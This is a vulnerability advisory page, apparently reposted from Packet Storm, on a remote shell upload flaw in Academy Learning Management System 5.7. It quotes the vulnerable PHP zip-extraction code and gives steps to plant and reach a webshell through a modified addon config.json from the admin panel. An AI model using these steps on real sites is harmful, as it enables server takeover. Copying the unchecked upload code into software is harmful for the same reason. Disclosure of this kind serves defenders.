Security
Headlines
HeadlinesLatestCVEs

Headline

Academy Learning Management System 5.7 Shell Upload

Academy Learning Management System version 5.7 suffers from a remote shell upload vulnerability.

Packet Storm
#vulnerability#web#ubuntu#js#php#auth
# Exploit Title: Academy Learning Management System 5.7 Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/academy-course-based-learning-management-system/22703468# Version: 5.7# Tested on Ubuntu 18.04Totally wrong architecture for uploading zip files on install addon ---Vulnerable Source Code ---$zipped_file_name = $_FILES['addon_zip']['name'];    if (!empty($zipped_file_name)) {      // Create update directory.      $dir = 'uploads/addons';      if (!is_dir($dir))      mkdir($dir, 0777, true);      $path = "uploads/addons/".$zipped_file_name;      if (class_exists('ZipArchive')) {        move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);        //Unzip uploaded update file and remove zip file.        $zip = new ZipArchive;        $zip->open($path);        $zip->extractTo('uploads/addons');        $zip->close();        unlink($path);      }else{        $this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));        redirect(site_url('admin/addon'), 'refresh');      }---Exploit------get request route "/admin/addon/add" at admin panel.And then for example download "certificate addon" nulled version.in addons config.json file add""" {            "root_directory"    : "uploads/addons/certificate/others/shell.php",            "update_directory"  : "uploads/certificates/shell.php"        },"""add your webshell to others folder in addon.click install addon button.And ta daa !->get request https://your-url/uploads/certificates/shell.php

Packet Storm: Latest News

Falco 0.39.1